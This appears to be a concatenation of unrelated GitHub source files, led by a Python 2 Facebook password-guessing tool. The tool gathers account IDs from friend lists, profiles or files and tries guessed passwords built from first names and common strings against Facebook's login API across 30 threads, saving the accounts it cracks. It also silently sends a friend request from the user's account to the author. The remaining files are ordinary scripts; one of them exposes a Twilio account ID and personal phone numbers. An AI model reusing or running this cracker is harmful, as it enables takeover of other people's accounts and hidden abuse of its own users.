x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """
██╗░░░██╗███╗░░░███╗░█████╗░██████╗░██╗
██║░░░██║████╗░████║██╔══██╗██╔══██╗██║
██║░░░██║██╔████╔██║███████║██████╔╝██║
██║░░░██║██║╚██╔╝██║██╔══██║██╔══██╗██║
╚██████╔╝██║░╚═╝░██║██║░░██║██║░░██║██║
░╚═════╝░╚═╝░░░░░╚═╝╚═╝░░╚═╝╚═╝░░╚═╝╚═╝
\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mR Bilal Kohati
\033[1;96mInstagram \033[1;93m: \033[1;mR Usman Koko
\033[1;96mFacebook \033[1;93m: \033[1; mR Nabi Tanha
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/umari/fb
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mR Bilal Wafa
\033[1;96mInstagram \033[1;93m: \033[1;92mR Usman koko
\033[1;96mFacebook \033[1;93m: \033[1;92mR Nabi tanha
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://Github.com/Umari/fb
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "umari"
CorrectPassword = "fb"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "Wrong Username"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/Omi6t')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
24ec79d14b8a83f2c499760bc56922b02185906e | 43f299b826dc0289108e3852f3c8d92ba47677b4 | /coursera_download_files.py | fb6a14746a13590d6abff3a7b396f612b4d70dc2 | [] | no_license | bertothunder/tools | daaeeeb2243ea0819c8f5b1d9ce622564a15f239 | 207b37edf4a0d9d953f36e248591ea889c8fcd46 | refs/heads/master | 2021-01-01T06:54:24.191178 | 2014-11-27T18:02:23 | 2014-11-27T18:02:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,997 | py |
#! /usr/bin/env python2.7
'Download all the class files to a local directory'
import os, re, dumbdbm, time, gzip, cStringIO, threading, sys, argparse
from collections import namedtuple
from multiprocessing.pool import ThreadPool as Pool
from pprint import pprint
# Web scrapping modules
import mechanize, cookielib
from BeautifulSoup import BeautifulSoup
Response = namedtuple('Response', ['code', 'msg', 'compressed', 'written'])
dirname = 'files'
def urlretrieve(url, filename, cache={}, lock=threading.Lock()):
    """Fetch *url*, strip the HTML down to its plain text, and save it to *filename*.

    cache: mutable-default dict shared across all calls on purpose -- it keeps
        the Etag / Last-Modified validators per url so unchanged pages come
        back as 304 Not Modified instead of being re-downloaded.
    lock: guards the shared cache when called concurrently from the thread pool.
    Returns a Response(code, msg, compressed, written) namedtuple.

    NOTE(review): 'urllib2' is used here but never imported in this file's
    header -- as written this raises NameError at call time; confirm intended
    imports (this is Python 2 code).
    """
    request = urllib2.Request(url)
    #request.add_header('Cache-Control', 'no-cache')
    # Not expecting compressed files
    #request.add_header('Accept-Encoding', 'gzip')
    with lock:
        # Attach conditional-request headers when we have seen this url before.
        if ('etag ' + url) in cache:
            request.add_header('If-None-Match', cache['etag ' + url])
        if ('mod ' + url) in cache:
            request.add_header('If-Modified-Since', cache['mod ' + url])
    try:
        u = urllib2.urlopen(request)
    except urllib2.HTTPError as e:
        # 304 Not Modified (and genuine HTTP errors) land here: report status,
        # write nothing.
        return Response(e.code, e.msg, False, False)
    content = u.read()
    u.close()
    compressed = u.info().getheader('Content-Encoding') == 'gzip'
    #if compressed:
    #    content = gzip.GzipFile(fileobj=cStringIO.StringIO(content), mode='rb').read()
    #else:
    soup = BeautifulSoup(content)
    # Let's take HTML out! soup.body(text=True) returns this as a list of **unicode**
    content = str(''.join(soup.body(text=True)))
    written = writefile(filename, content)
    with lock:
        # Remember the validators for the next conditional request to this url.
        etag = u.info().getheader('Etag')
        if etag:
            cache['etag ' + url] = etag
        timestamp = u.info().getheader('Last-Modified')
        if timestamp:
            cache['mod ' + url] = timestamp
    return Response(u.code, u.msg, compressed, written)
def writefile(filename, content):
    """Write *content* to *filename* unless the file already holds it.

    Returns:
        bool: True when the file was (re)written, False when the on-disk
        bytes already matched and nothing was done.
    """
    existing = None
    try:
        with open(filename, 'rb') as handle:
            existing = handle.read()
    except IOError:
        # Missing or unreadable file: treat as "no existing content" and
        # fall through to the write below.
        existing = None
    if existing == content:
        return False
    with open(filename, 'wb') as handle:
        handle.write(content)
    return True
def download(target, dirname=dirname):
    """Retrieve a target url, save it under *dirname* and return a status string.

    target: sequence of [url] or [url, display_name]; when no name is given,
        the last path component of the url is used as the filename.
    Note: the default for *dirname* is bound to the module-level constant at
        definition time (intentional -- both refer to the same value).
    """
    url, filename = target[0], target[1] if len(target) > 1 else target[0].split('/')[-1]
    # Keep only the basename in case the link text itself contains slashes.
    filename = filename.rsplit('/', 1)[-1]
    fullname = os.path.join(dirname, filename)
    r = urlretrieve(url, fullname, etags)  # 'etags' is the module-level dumbdbm cache
    if r.code != 200:
        return '%3d %-16s %s --> %s' % (r.code, r.msg, url, fullname)
    written = '(updated)' if r.written else '(current)'  # NOTE(review): computed but never used in the format below -- probably meant to replace one of the duplicated 'fullname' fields
    return '%3d%1s %-16s %-55s --> %-25s -> %s' % \
        (r.code, r.compressed, r.msg, url, fullname, fullname)
def parseCmdlineOptions(argv=None):
    """Parse the script's command-line options.

    Bug fix: the original called ``argparse.Options()``, which does not exist
    (the module exposes ``ArgumentParser``) and raised AttributeError as soon
    as the function ran.

    Args:
        argv: optional list of argument strings; None means sys.argv[1:]
            (new parameter, backward-compatible default).

    Returns:
        argparse.Namespace: the parsed options (currently none are defined).
    """
    parser = argparse.ArgumentParser(
        description='Download all the class files to a local directory')
    # Individual options will be added here as the script grows.
    return parser.parse_args(argv)
def login(browser):
    """Sign *browser* (a mechanize.Browser) into Coursera.

    Fixes vs. the original:
    - the ``browser`` parameter was ignored in favour of the global ``br``;
    - ``logging`` was used without being imported (NameError);
    - ``response`` was referenced without ever being assigned (NameError);
    - the last line ended with a dangling ``.`` (SyntaxError) and tried to
      drive the sign-in form through BeautifulSoup, which cannot fill or
      submit forms; mechanize's own form API is used instead.

    Returns:
        bool: True once the sign-in form has been submitted.
    """
    import logging  # local import: the module header does not import logging

    browser.set_handle_robots(False)
    # Keep cookies so the authenticated session survives the login redirect.
    cj = cookielib.CookieJar()
    browser.set_cookiejar(cj)
    # Allow refresh of the content
    browser.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    # Set the fake user-agent and rest of headers to emulate the browser
    browser.addheaders = [('User-agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11'),
                          ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
                          ('Accept-Encoding', 'gzip,deflate,sdch'),
                          ('Accept-Language', 'en-US,en;q=0.8'),
                          ('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.3'),
                          ]
    logger = logging.getLogger("mechanize")
    logger.addHandler(logging.StreamHandler(sys.stdout))
    logger.setLevel(logging.DEBUG)
    # Open the sign-in page; on success Coursera redirects to the lecture list
    # encoded in the 'r=' query parameter.
    browser.open('https://accounts.coursera.org/signin?course_id=973439&r=https%3A%2F%2Fclass.coursera.org%2Fprogfun-005%2Flecture&user_action=class&topic_name=Functional%20Programming%20Principles%20in%20Scala')
    # Fill and submit the sign-in form with mechanize's form API.
    # NOTE(review): control names 'email'/'password' are assumed from the
    # page's input ids ('signin-email'/'signin-password') -- confirm against
    # the live form before relying on this.
    browser.select_form(nr=0)
    browser['email'] = 'my-username'
    browser['password'] = 'my-password'
    browser.submit()
    return True
if __name__ == '__main__':
    try:
        os.mkdir(dirname)
    except OSError:
        # Directory already exists -- fine.
        pass
    coursera_course_url = 'https://class.coursera.org/progfun-005/lecture'
    # Set up mechanize to perform login and handle redirection to the download area.
    br = mechanize.Browser()
    if login(br):
        pass
    # Persistent Etag/Last-Modified cache so unchanged files are skipped on re-runs.
    etags = dumbdbm.open(os.path.join(dirname, 'etag_db'))
    try:
        content = urllib2.urlopen(files_url)  # NOTE(review): 'files_url' is never defined (NameError) -- 'coursera_course_url' above was probably intended; 'urllib2' is also never imported in this file.
        content_html = content.read()
        print (' Index page downloaded, parsing files to download').center(117, '=')
        soup = BeautifulSoup(content_html)
        targets = []
        # Rebuild an absolute url for every anchor on the index page.
        for link in soup.findAll('a'):
            parts = content.geturl().split('/')
            # parts will be 'http:','','whatever','whatever','whatever','index.html'
            parts.pop(1)
            parts[0] = 'http:/'
            parts.pop(-1)
            parts.append(link.get('href'))
            # parts from BeautifulSoup are unicode, but key searching above will be string
            fullurl = str('/'.join(parts))
            targets.append([fullurl, link.text])
        print (' Starting download at %s ' % time.ctime()).center(117)
        # imap_unordered streams results as they finish; older Pythons lack it.
        mapper = Pool(25).imap if sys.version_info < (2, 7) else Pool(25).imap_unordered
        for line in mapper(download, targets):
            print line
    finally:
        etags.close()
| [
"acurrope@cisco.com"
] | acurrope@cisco.com |
252f6b30ab9c777e478f9d48787a4711d088af58 | 9729365a58351c9cf42edb932b8272db8ca98b6f | /CRIMSONModuleTemplate/Template/SolverStudies/template.py | 45d2b6ae369ddfa9a4917b294becfc854d13af01 | [] | no_license | rkhlebnikov/CRIMSONPythonModules | fbde5666aceae947a575f661518306694f052559 | b72865579e3b503940986e9217d3541a66ee92d5 | refs/heads/master | 2023-03-04T03:06:37.004018 | 2021-09-21T20:42:30 | 2021-09-21T20:42:30 | 48,180,113 | 3 | 3 | null | 2023-03-01T15:25:27 | 2015-12-17T14:50:33 | Python | UTF-8 | Python | false | false | 1,700 | py | from PythonQt import QtGui
from PythonQt.CRIMSON import FaceType
from PythonQt.CRIMSON import Utils
from CRIMSONCore.SolutionStorage import SolutionStorage
from {{ModuleName}}.BoundaryConditions import ({{#BoundaryConditionNames}}{{name}}, {{/BoundaryConditionNames}})
class {{ClassName}}(object):
def __init__(self):
self.meshNodeUID = ""
self.solverParametersNodeUID = ""
self.boundaryConditionSetNodeUIDs = []
self.materialNodeUIDs = []
def getMeshNodeUID(self):
return self.meshNodeUID
def setMeshNodeUID(self, uid):
self.meshNodeUID = uid
def getSolverParametersNodeUID(self):
return self.solverParametersNodeUID
def setSolverParametersNodeUID(self, uid):
self.solverParametersNodeUID = uid
def getBoundaryConditionSetNodeUIDs(self):
return self.boundaryConditionSetNodeUIDs
def setBoundaryConditionSetNodeUIDs(self, uids):
self.boundaryConditionSetNodeUIDs = uids
def getMaterialNodeUIDs(self):
return self.materialNodeUIDs
def setMaterialNodeUIDs(self, uids):
self.materialNodeUIDs = uids
def loadSolution(self):
# Implement if needed - see documentation
pass
def writeSolverSetup(self, vesselForestData, solidModelData, meshData, solverParameters, boundaryConditions,
materials, vesselPathNames, solutionStorage):
# Get the output folder
outputDir = QtGui.QFileDialog.getExistingDirectory(None, 'Select output folder')
if not outputDir:
return
# Write the files for your solver. See documentation for details
raise NotImplementedError() | [
"r.khlebnikov@gmail.com"
] | r.khlebnikov@gmail.com |
b5bfb5e75a09d0dabb71a971677befdb2e4ce011 | b0c40ad8f68f099a49449efcc037ee6bfdafa5e2 | /python/20190508 challenges/fizzbuzz_game_answer.py | 4dd00810b33d34b2ec089b8d909508c36943b60a | [] | no_license | behappyny/python_study | f8f2dc1ed7070290af82274da5c411e68e19e2a8 | 556c715047d09d60213f9d098ebd29124a9fdc0a | refs/heads/master | 2020-03-08T13:31:34.955775 | 2019-05-14T03:13:25 | 2019-05-14T03:13:25 | 128,160,093 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | a = 30
if a % 15 == 0:
print('FizzBuzz')
elif a % 3 == 0:
print('Fizz')
elif a % 5 == 0:
print('Buzz')
else:
print('a') | [
"noreply@github.com"
] | noreply@github.com |
a3e8f85b15362854f00e8158fedd47775ff9a1fb | 9b5597492e57313712c0a842ef887940f92636cd | /judge/sessions/2018Individual/sgessow@gmail.com/PB_02.py | f67c2bfbbc1ddd96d57cfd996db5fcf43c0930bf | [] | no_license | onionhoney/codesprint | ae02be9e3c2354bb921dc0721ad3819539a580fa | fcece4daf908aec41de7bba94c07b44c2aa98c67 | refs/heads/master | 2020-03-11T11:29:57.052236 | 2019-05-02T22:04:53 | 2019-05-02T22:04:53 | 129,971,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | Cases=input()
Cases=int(Cases)
for i in range(Cases):
Num1= [int(x) for x in input().split()]
Num2= [int(x) for x in input().split()]
Num3= [int(x) for x in input().split()]
count=0
ans=[]
for i in Num1:
if i==1:
ans.append(count)
count=count+1
count=0
for i in Num2:
if i==1:
ans.append(count)
count=count+1
count=0
for i in Num3:
if i==1:
ans.append(count)
count=count+1
print(ans[0],ans[1],ans[2])
| [
"root@codesprintla.com"
] | root@codesprintla.com |
4fcb401701f06fd6fd59e2e4e19e1e9a75953692 | 0f4c9d1a717b362291ce6eedca3160ce23532e0d | /day-35-rain-alert/main1.py | 8ee7f6f3d2cf2789304b054cada1e1d35724b7f7 | [] | no_license | leba0495/100-Days-Of-Python-Journey | 2de22e784b3b18e00edf60ad788158a3c169d14e | 9df993b10c29f610b5d7504b0c3a29e08677ce77 | refs/heads/main | 2023-02-22T08:47:34.588505 | 2021-01-24T23:37:57 | 2021-01-24T23:37:57 | 324,022,719 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | import requests
import os
from twilio.rest import Client
from twilio.http.http_client import TwilioHttpClient
# Info for request from OpenWeather
OWM_Endpoint = "https://api.openweathermap.org/data/2.5/onecall?"
API_KEY = os.environ.get("OMW_API_KEY")
MY_LAT = 40.678177
MY_LONG = -73.944160
# Info for twilio functionality
account_sid = "AC1e6a6f8e68b0b3b68d7cb65aa5371f20"
auth_token = os.environ.get("AUTH_TOKEN")
weather_params = {
"lat": MY_LAT,
"lon": MY_LONG,
"appid": API_KEY,
"exclude": "current,minutely,daily,alert"
}
def check_for_rain(code_list):
    """Return True when any OpenWeather condition code signals precipitation.

    Condition codes below 700 cover thunderstorms, drizzle, rain and snow;
    700+ are atmosphere/clear/clouds groups.
    """
    return any(code < 700 for code in code_list)
# One Call API request: forecast for the configured coordinates.
response = requests.get(OWM_Endpoint, params=weather_params)
response.raise_for_status()
weather_data = response.json()
# Only consider the next 12 hours of the hourly forecast.
hourly_data_list = weather_data["hourly"][0:12]
weather_codes = [hour["weather"][0]["id"] for hour in hourly_data_list]
if check_for_rain(weather_codes):
    # Route Twilio traffic through the https proxy from the environment --
    # presumably required by the hosting environment; confirm before removing.
    proxy_client = TwilioHttpClient()
    proxy_client.session.proxies = {'https': os.environ['https_proxy']}
    client = Client(account_sid, auth_token, http_client=proxy_client)
    # Send the SMS reminder via Twilio.
    message = client.messages.create(
        body="It's going to rain today. Remember to bring an umbrella ☂️",
        from_="+19495580047",
        to="+16464705796"
    )
    print(message.status)
| [
"noreply@github.com"
] | noreply@github.com |
